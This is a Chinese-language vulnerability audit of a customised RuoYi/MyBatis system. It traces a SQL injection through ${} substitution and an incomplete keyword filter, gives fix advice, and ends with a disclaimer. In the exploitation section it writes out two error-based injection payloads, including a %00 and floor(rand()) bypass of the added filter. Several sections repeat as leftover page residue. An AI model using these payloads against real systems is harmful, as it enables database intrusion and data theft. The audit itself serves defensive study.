若依二开系统SQL注入漏洞审计与分析<\/h1>

一、系统概述<\/h2>

系统基于若依(RuoYi)框架进行二次开发<\/li>
采用MyBatis作为ORM框架<\/li>

存在部分若依历史漏洞的过滤机制，但过滤不严格<\/li> <\/ul>

二、漏洞描述<\/h2>

系统存在SQL注入漏洞，主要原因是：<\/p>

使用了MyBatis的%{}<\/code>语法<\/li>
虽然实现了过滤机制，但过滤不彻底<\/li>

导致攻击者可以构造特殊SQL语句绕过过滤<\/li>
<\/ol>
三、漏洞定位过程<\/h2>
1. 初始发现<\/h3>

全局搜索%{<\/code>语法，发现存在SQL注入风险点<\/li>
定位到直接使用${sql}<\/code>语句的代码位置<\/li>
<\/ul>
2. 调用链追踪<\/h3>

向上跟踪路由，发现Controller层直接传入SQL语句<\/li>
跟踪filterKeyword<\/code>过滤函数<\/li>
<\/ol>
3. 过滤机制分析<\/h3>
系统过滤了以下关键字：<\/p>

updatexml<\/code><\/li>
extractvalue<\/code><\/li>
sleep<\/code><\/li>
*<\/code>号<\/li>
其他常见SQL注入关键词<\/li>
<\/ul>
四、漏洞利用方法<\/h2>
1. 原始若依框架绕过方法<\/h3>
原若依框架可使用payload：<\/p>
CREATE<\/span> table<\/span> a1 as<\/span> SELECT<\/span>\/**\/<\/span>extractvalue(1<\/span>,concat(0<\/span>x7e,(select<\/span>\/**\/<\/span>database<\/span>()),0<\/span>x7e))
<\/span><\/span><\/code><\/pre>2. 当前系统绕过方法<\/h3>
由于新增了过滤，使用替代payload：<\/p>
CREATE<\/span> table<\/span> abc1 as<\/span> SELECT<\/span>-<\/span>COUNT<\/span>(*<\/span>) FROM<\/span> information_schema.tables GROUP<\/span> BY<\/span> CONCAT((SELECT<\/span>%<\/span>00<\/span>USER<\/span>%<\/span>00<\/span>()),floor(rand(0<\/span>)*<\/span>2<\/span>))
<\/span><\/span><\/code><\/pre>3. 关键绕过技术<\/h3>

使用%00<\/code>替代空格<\/li>
user%00()<\/code>等价于user()<\/code>函数<\/li>
利用floor<\/code>函数进行报错注入<\/li>
<\/ol>
五、漏洞修复建议<\/h2>

避免直接使用${}<\/code>语法，改用#{}<\/code>预编译<\/li>
完善过滤机制，增加对%00<\/code>等特殊字符的过滤<\/li>
增加对floor<\/code>、rand<\/code>等函数的过滤<\/li>
实现参数化查询<\/li>
<\/ol>
六、参考资源<\/h2>

若依框架SQL过滤绕过分析：https:\/\/blog.takake.com\/posts\/7219\/<\/a><\/li>
<\/ul>
七、免责声明<\/h2>

本文仅供技术研究参考<\/li>
使用相关技术需遵守《中华人民共和国网络安全法》<\/li>
请勿用于非法用途<\/li>
<\/ol>

若依二开系统SQL注入漏洞审计与分析<\/h1>

三、漏洞定位过程<\/h2>

四、漏洞利用方法<\/h2>

六、参考资源<\/h2> 若依框架SQL过滤绕过分析：https:\/\/blog.takake.com\/posts\/7219\/<\/a><\/li> <\/ul> 七、免责声明<\/h2> 本文仅供技术研究参考<\/li> 使用相关技术需遵守《中华人民共和国网络安全法》<\/li> 请勿用于非法用途<\/li> <\/ol>

七、免责声明<\/h2> 本文仅供技术研究参考<\/li> 使用相关技术需遵守《中华人民共和国网络安全法》<\/li> 请勿用于非法用途<\/li> <\/ol>

六、参考资源<\/h2>

若依框架SQL过滤绕过分析：https:\/\/blog.takake.com\/posts\/7219\/<\/a><\/li> <\/ul>
七、免责声明<\/h2>

本文仅供技术研究参考<\/li>
使用相关技术需遵守《中华人民共和国网络安全法》<\/li>
请勿用于非法用途<\/li> <\/ol>

七、免责声明<\/h2>

本文仅供技术研究参考<\/li>
使用相关技术需遵守《中华人民共和国网络安全法》<\/li>
请勿用于非法用途<\/li> <\/ol>